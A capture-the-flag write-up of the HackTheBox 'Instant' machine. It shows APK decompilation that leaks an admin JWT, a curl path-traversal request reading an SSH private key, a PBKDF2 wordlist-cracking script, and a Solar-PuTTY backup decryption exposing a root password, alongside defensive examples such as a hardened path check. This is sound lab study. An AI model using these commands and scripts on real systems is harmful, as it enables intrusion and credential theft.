Instant on HackTheBox

Before all

Victim’s IP : 10.10.11.37
Victim’s Host : *.instant.htb
Attacker’s IP : 10.10.14.10

RECON

port scan

Command

rustscan -a 10.10.11.37 --ulimit 5000 -- -sC -sV -Pn

Ports 22 and 80 are open; the web service on port 80 gives the domain instant.htb.

Exploit

APK reverse engineering: information leaks

Upload the APK to decompiler.com to decompile it, download the output and grep through it. It leaks a few hostnames and a hardcoded admin JWT token, in
/sources/com/instantlabs/instant/AdminActivities.java

package com.instantlabs.instant;

import com.google.gson.JsonParser;
import com.google.gson.JsonSyntaxException;
import java.io.IOException;
import okhttp3.Call;
import okhttp3.Callback;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.Response;

public class AdminActivities {
    private String TestAdminAuthorization() {
        new OkHttpClient().newCall(new Request.Builder().url("http://mywalletv1.instant.htb/api/v1/view/profile").addHeader("Authorization", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA").build()).enqueue(new Callback() {
            static final /* synthetic */ boolean $assertionsDisabled = false;

            static {
                Class<AdminActivities> cls = AdminActivities.class;
            }

            public void onFailure(Call call, IOException iOException) {
                System.out.println("Error Here : " + iOException.getMessage());
            }

            public void onResponse(Call call, Response response) throws IOException {
                if (response.isSuccessful()) {
                    try {
                        System.out.println(JsonParser.parseString(response.body().string()).getAsJsonObject().get("username").getAsString());
                    } catch (JsonSyntaxException e) {
                        System.out.println("Error Here : " + e.getMessage());
                    }
                }
            }
        });
        return "Done";
    }
}
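Once an Authorization header value is grepped out of decompiled sources, the first thing to check is what the token actually claims, because that decides whether it is worth replaying. The following is an added example, not code from the original writeup or from the Instant app: it finds JWT-shaped strings in a chunk of text (the sample line is taken from the decompiled AdminActivities.java above, so the token itself is the page's), decodes header and payload without verifying the signature (the HMAC secret is not known), and flags a privileged role and an expiry far in the future. The regex and the summary fields are my own choices, not anything the app defines.

```python
import base64
import json
import re
from datetime import datetime, timedelta, timezone

# One line from the decompiled AdminActivities.java shown above (the token is from the page)
SAMPLE_SOURCE = (
    '.addHeader("Authorization", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.'
    'eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.'
    'v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA")'
)

# Three base64url segments; a JSON header always encodes to a segment starting with "eyJ"
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def find_jwts(text):
    """Return every JWT-shaped string in text (shape only, no validation of contents)."""
    return JWT_RE.findall(text)


def b64url_decode(segment):
    """Decode unpadded base64url, which is how JWT segments are encoded."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def decode_jwt_unverified(token):
    """Parse header and payload. The signature is NOT checked: we do not hold the key."""
    header_b64, payload_b64, _signature = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    return header, payload


def summarize(token, now=None):
    """Pull out the claims that matter when triaging a leaked token."""
    now = now or datetime.now(timezone.utc)
    header, payload = decode_jwt_unverified(token)
    exp = payload.get("exp")
    # timedelta arithmetic avoids platform limits of fromtimestamp() for huge exp values
    expires_at = EPOCH + timedelta(seconds=exp) if exp is not None else None
    return {
        "alg": header.get("alg"),
        "role": payload.get("role"),
        "id": payload.get("id"),
        "expires_at": expires_at,
        "still_valid": expires_at is None or expires_at > now,
        # A token that stays valid for decades is effectively a permanent credential
        "long_lived": expires_at is not None and expires_at - now > timedelta(days=365),
    }


if __name__ == "__main__":
    for tok in find_jwts(SAMPLE_SOURCE):
        info = summarize(tok)
        print(json.dumps({k: str(v) for k, v in info.items()}, indent=2))
```

Run against the leaked token this reports role Admin and an exp in the year 3023, which is why the token still works against the API below: it was shipped inside the client and never expires in practice.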

Also grepped out of the decompiled resources, the subdomains:

./resources/res/8G.xml: <domain includeSubdomains="true">mywalletv1.instant.htb
./resources/res/8G.xml: <domain includeSubdomains="true">swagger-ui.instant.htb

Of these, swagger-ui.instant.htb documents how the API is used. There I found /api/v1/admin/read/log, which takes the parameter log_file_name.

LFI through the admin API

Use the LFI in the log reader, together with the leaked admin token, to read the SSH private key. The endpoint evidently resolves log_file_name relative to a directory directly under the account's home, since a single ../ reaches .ssh/id_rsa:
curl 'http://mywalletv1.instant.htb/api/v1/admin/read/log?log_file_name=../.ssh/id_rsa' -H 'Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA'

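The read/log endpoint behaves like a handler that joins the user-supplied name onto a log directory and reads whatever the result points at. Below, as an added example that is not the Instant API's code, is that pattern in miniature: a naive handler next to a hardened one that resolves the path and refuses anything outside the log directory. The directory layout (a home with logs/ and .ssh/id_rsa) is constructed in a temp dir to mirror the traversal used above; file contents are made up.

```python
import os
import tempfile


class PathTraversal(Exception):
    pass


def read_log_unsafe(log_dir, log_file_name):
    """Vulnerable: os.path.join follows '..' straight out of log_dir."""
    with open(os.path.join(log_dir, log_file_name), "r") as f:
        return f.read()


def read_log_safe(log_dir, log_file_name):
    """Hardened: resolve symlinks and '..', then require the result to stay under log_dir."""
    base = os.path.realpath(log_dir)
    target = os.path.realpath(os.path.join(base, log_file_name))
    # commonpath == base means target is inside base; also reject base itself
    if os.path.commonpath([base, target]) != base or target == base:
        raise PathTraversal(log_file_name)
    with open(target, "r") as f:
        return f.read()


def build_fixture():
    """Constructed layout: <home>/logs/ for logs and <home>/.ssh/id_rsa as the secret."""
    home = tempfile.mkdtemp(prefix="home-")
    os.makedirs(os.path.join(home, "logs"))
    os.makedirs(os.path.join(home, ".ssh"))
    with open(os.path.join(home, "logs", "app.log"), "w") as f:
        f.write("INFO started\n")
    with open(os.path.join(home, ".ssh", "id_rsa"), "w") as f:
        f.write("-----BEGIN OPENSSH PRIVATE KEY----- (constructed, not a real key)\n")
    return os.path.join(home, "logs")


def demo():
    """Exercise both handlers with a legitimate name and with the traversal used above."""
    log_dir = build_fixture()
    results = {
        "unsafe_legit": read_log_unsafe(log_dir, "app.log"),
        "unsafe_traversal": read_log_unsafe(log_dir, "../.ssh/id_rsa"),
        "safe_legit": read_log_safe(log_dir, "app.log"),
    }
    try:
        read_log_safe(log_dir, "../.ssh/id_rsa")
        results["safe_traversal"] = "ALLOWED"
    except PathTraversal:
        results["safe_traversal"] = "BLOCKED"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value.strip()}")
```

The realpath step matters: a check on the raw string (for example rejecting a literal "..") is bypassable with absolute paths or symlinks, whereas comparing resolved paths closes both.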

Then SSH in with the recovered key:

sudo ssh shirohige@10.10.11.37 -i id_rsa

Privilege Escalation

password cracking

Using linpeas to help enumerate paths, I found the service's database at
/home/shirohige/projects/mywallet/Instant-Api/mywallet/instance/instant.db
Pulling it down yields a pbkdf2 hash for the user shirohige.
John and Hashcat did not recognise it as-is (the Werkzeug pbkdf2:sha256:<iterations>$<salt>$<hex> layout is not a format hashcat auto-detects), so I wrote my own script:

import hashlib
import threading
from queue import Queue, Empty

# Werkzeug-style hash: pbkdf2:<digest>:<iterations>$<salt>$<hex digest>
hash_to_crack = "pbkdf2:sha256:600000$YnRgjnim$c9541a8c6ad40bc064979bc446025041ffac9af2f762726971d8a28272c550ed"
algorithm_iterations, salt, target_hash = hash_to_crack.split('$')
digest_name = algorithm_iterations.split(':')[1]
iterations = int(algorithm_iterations.split(':')[-1])

wordlist_path = "/home/kali/rockyou.txt"

queue = Queue()
num_threads = 100
found = None
lock = threading.Lock()

def worker():
    global found
    while True:
        try:
            password = queue.get_nowait()
        except Empty:
            return
        try:
            # After a hit, keep draining so every item gets task_done() and queue.join() returns
            if found is not None:
                continue
            hashed_password = hashlib.pbkdf2_hmac(
                digest_name,
                password.encode("latin-1"),
                salt.encode(),
                iterations
            ).hex()
            if hashed_password == target_hash:
                with lock:
                    found = password
                print(f"[+] Password found: {password}")
        finally:
            queue.task_done()

def main():
    print("[*] Loading wordlist and starting threads...")
    try:
        # rockyou is latin-1; only strip the line ending so passwords with spaces survive
        with open(wordlist_path, "r", encoding="latin-1") as wordlist:
            for line in wordlist:
                queue.put(line.rstrip("\r\n"))
    except FileNotFoundError:
        print(f"[!] Wordlist not found: {wordlist_path}")
        return

    for _ in range(num_threads):
        t = threading.Thread(target=worker, daemon=True)
        t.start()

    queue.join()

    if found is None:
        print("[-] Password not found in the wordlist.")

if __name__ == "__main__":
    main()

Password obtained: estrella
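A custom script works, but hashcat's GPU path is far faster for 600,000-iteration PBKDF2 once the hash is in a shape it accepts. As an added example, not part of the original writeup, the block below rewrites the Werkzeug hash into hashcat mode 10900 input (PBKDF2-HMAC-SHA256, `sha256:<iterations>:<base64 salt>:<base64 digest>`) and includes a single-candidate verifier to confirm a cracked result offline. The function names are my own; the hash and the password estrella are the ones from this writeup.

```python
import base64
import hashlib
import hmac

# Hash recovered from instant.db (from the writeup above)
WERKZEUG_HASH = "pbkdf2:sha256:600000$YnRgjnim$c9541a8c6ad40bc064979bc446025041ffac9af2f762726971d8a28272c550ed"


def parse_werkzeug_pbkdf2(h):
    """Split 'pbkdf2:<digest>:<iterations>$<salt>$<hexdigest>' into its parts."""
    method, salt, digest_hex = h.split("$")
    scheme, digest_name, iterations = method.split(":")
    if scheme != "pbkdf2":
        raise ValueError(f"not a pbkdf2 hash: {scheme}")
    return digest_name, int(iterations), salt, bytes.fromhex(digest_hex)


def to_hashcat_10900(h):
    """Rewrite a Werkzeug pbkdf2:sha256 hash as a hashcat -m 10900 line:
    sha256:<iterations>:<base64 salt>:<base64 digest>."""
    digest_name, iterations, salt, digest = parse_werkzeug_pbkdf2(h)
    if digest_name != "sha256":
        raise ValueError("hashcat -m 10900 is PBKDF2-HMAC-SHA256 only")
    return "sha256:{}:{}:{}".format(
        iterations,
        base64.b64encode(salt.encode()).decode(),
        base64.b64encode(digest).decode(),
    )


def check_password(h, candidate):
    """Recompute the PBKDF2 digest for one candidate and compare in constant time."""
    digest_name, iterations, salt, digest = parse_werkzeug_pbkdf2(h)
    computed = hashlib.pbkdf2_hmac(digest_name, candidate.encode(), salt.encode(), iterations)
    return hmac.compare_digest(computed, digest)


if __name__ == "__main__":
    print(to_hashcat_10900(WERKZEUG_HASH))
    print("estrella ->", check_password(WERKZEUG_HASH, "estrella"))
```

Feed the printed line to `hashcat -m 10900 hash.txt rockyou.txt`; the verifier is for confirming a hit before typing it into an SSH prompt.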

Decrypt Solar-PuTTY data

Another suspicious directory turned up: /opt/backups/Solar-PuTTY. A quick search shows Solar-PuTTY is a SolarWinds session manager for SSH/SFTP/SCP and similar connections; its exported session data is encrypted and needs a password to open.
The directory holds a single file, sessions-backup.dat.


Decrypt it with this tool:
https://github.com/VoidSec/SolarPuttyDecrypt/releases/tag/v1.0

Command (the backup password turns out to be the same estrella cracked above, i.e. password reuse):

SolarPuttyDecrypt.exe sessions-backup.dat estrella

-----------------------------------------------------
SolarPutty's Sessions Decrypter by VoidSec
-----------------------------------------------------

{
  "Sessions": [
    {
      "Id": "066894ee-635c-4578-86d0-d36d4838115b",
      "Ip": "10.10.11.37",
      "Port": 22,
      "ConnectionType": 1,
      "SessionName": "Instant",
      "Authentication": 0,
      "CredentialsID": "452ed919-530e-419b-b721-da76cbe8ed04",
      "AuthenticateScript": "00000000-0000-0000-0000-000000000000",
      "LastTimeOpen": "0001-01-01T00:00:00",
      "OpenCounter": 1,
      "SerialLine": null,
      "Speed": 0,
      "Color": "#FF176998",
      "TelnetConnectionWaitSeconds": 1,
      "LoggingEnabled": false,
      "RemoteDirectory": ""
    }
  ],
  "Credentials": [
    {
      "Id": "452ed919-530e-419b-b721-da76cbe8ed04",
      "CredentialsName": "instant-root",
      "Username": "root",
      "Password": "12**24nzC!r0c%q12",
      "PrivateKeyPath": "",
      "Passphrase": "",
      "PrivateKeyContent": null
    }
  ],
  "AuthScript": [],
  "Groups": [],
  "Tunnels": [],
  "LogsFolderDestination": "C:\\ProgramData\\SolarWinds\\Logs\\Solar-PuTTY\\SessionLogs"
}

Finally, the saved session points at this same host (10.10.11.37, port 22); logging in as root with the recovered password 12**24nzC!r0c%q12 succeeds.

After all

Now waiting for the results to be announced, rubbing my hands in anticipation.